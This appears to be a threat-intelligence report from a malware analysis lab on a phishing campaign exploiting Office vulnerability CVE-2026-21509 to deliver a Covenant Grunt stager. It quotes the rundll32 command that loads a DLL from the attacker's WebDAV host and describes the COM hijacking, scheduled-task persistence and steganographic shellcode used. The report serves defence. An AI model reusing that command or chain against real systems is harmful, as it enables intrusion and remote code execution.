Irondefence Malware Analysis Lab
Back to archive
ENG PL

Report dossier

CVE-2026-21509 | Campaign analysis and COM abuse chain

English edition of the report covering CVE-2026-21509 exploitation and Covenant Grunt delivery.

Published 15/03/2026
Report ID cve-2026-21509-crafty-leshy
Language English
Available English / Polish
TLP CLEAR
Sections 7
Tags
officephishingcovenantcom abuse

CVE-2026-21509

This report documents a phishing campaign abusing CVE-2026-21509 in Microsoft Office to trigger a COM-based execution chain and deliver a Covenant Grunt payload. Analysis indicates that the adversary weaponized the vulnerability shortly after public disclosure and used highly targeted phishing lures aligned with both sender and recipient context.

Vulnerability overview

CVE-2026-21509 stems from improper validation of untrusted input used by Microsoft Office during security decisions. In the observed scenario, a crafted document bypassed the Compatibility Flags protection logic and initialized a COM object that started the downstream infection chain.

From the victim perspective, opening the malicious document was sufficient to trigger execution.

Observed infection chain

The document embedded the OLE object Shell.Explorer.1 with CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B. That object initiated retrieval and execution of a remote .lnk file hosted over WebDAV.

The shortcut ultimately led Windows to execute:

rundll32.exe shell32.dll,Control_RunDLL "\\freefoodaid.com@SSL\tables\tables.d"

This loaded a malicious DLL and advanced the attack into persistence and payload staging. Subsequent stages included COM Hijacking, task creation and process restart logic designed to reactivate the malicious component inside explorer.exe.

Persistence and staging

The attack chain modified COM-related registry keys to establish persistence and then created a scheduled task that terminated and restarted explorer.exe. This ensured the hijacked COM component would be reloaded in a trusted process context.

Later, EhStoreShell.dll extracted shellcode from SplashScreen.png using LSB steganography and executed it in memory. The payload was identified as a Covenant Grunt stager communicating through filen[.]io.

Analyst notes

The campaign stands out because of its targeting quality and the operational discipline visible in lure construction. The use of compromised mailboxes, matching message themes and follow-on persistence mechanisms strongly suggests a mature operator.

Recommendations

  • Apply Microsoft Office security updates immediately.
  • Hunt for WebDAV activity and suspicious rundll32.exe launches tied to remote .cpl or DLL resources.
  • Review scheduled tasks and COM persistence artifacts under user-controlled registry paths.
  • Use YARA and IOC-based searches to identify related mail and endpoint artifacts.

Detection snippet

Get-ScheduledTask | Where-Object {
  $_.TaskName -match "OneDriveHealth"
}

Conclusion

This case illustrates how quickly a capable adversary can operationalize a newly disclosed Office vulnerability. Even with relatively limited user interaction, the chain enabled code execution, persistence and memory-resident staging.